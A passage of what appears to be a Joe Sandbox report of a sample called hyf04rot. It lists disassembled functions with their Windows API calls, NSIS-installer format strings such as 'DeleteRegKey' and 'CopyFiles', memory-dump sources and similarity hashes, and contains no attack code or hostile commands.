                                                                                                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                                              • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                                              Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                                              • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                                              Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                              • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                                              • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                                              Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                              • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                                              • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                                              Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                              • String ID: $@rD
                                                                                                                                                                                                                                                                                              • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                                              • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                                              • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                                              Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                              • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                                              • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                                              Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                              • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                              • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                              • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                                              • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                                              Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                              • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                              • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                                              • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                                              Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                              • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                                              • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                                              Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                              • String ID: Version
                                                                                                                                                                                                                                                                                              • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                              • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                                              • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
